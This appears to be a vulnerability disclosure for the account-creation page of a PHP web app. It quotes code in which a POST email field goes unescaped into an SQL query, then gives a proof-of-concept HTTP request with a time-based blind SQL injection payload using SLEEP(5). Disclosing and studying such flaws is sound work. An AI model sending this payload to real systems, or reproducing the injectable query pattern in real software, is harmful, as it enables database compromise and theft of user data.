Found a vulnerability

[0clickjacking0]

Vulnerability file address

create-account.php from line 43,The $email parameter is controllable, the parameter newemail can be passed through post, and the $email is not protected from sql injection, line 59 $result= $database->query("select * from webuser where email='$email ';"); causes sql injection

......
......
......
if($_POST){

    $result= $database->query("select * from webuser");

    $fname=$_SESSION['personal']['fname'];
    $lname=$_SESSION['personal']['lname'];
    $name=$fname." ".$lname;
    $address=$_SESSION['personal']['address'];
    $nic=$_SESSION['personal']['nic'];
    $dob=$_SESSION['personal']['dob'];
    $email=$_POST['newemail'];
    $tele=$_POST['tele'];
    $newpassword=$_POST['newpassword'];
    $cpassword=$_POST['cpassword'];
    
    if ($newpassword==$cpassword){
        $result= $database->query("select * from webuser where email='$email';");
......
......
......

POC

POST /create-account.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/create-account.php
Cookie: PHPSESSID=oumjp2nqchjcrin2va1fh9n077
Upgrade-Insecure-Requests: 1

[email protected]' AND (SELECT 5395 FROM (SELECT(SLEEP(5)))Jkvf)-- erhH&tele=0712345678&newpassword=1&cpassword=1

Attack results pictures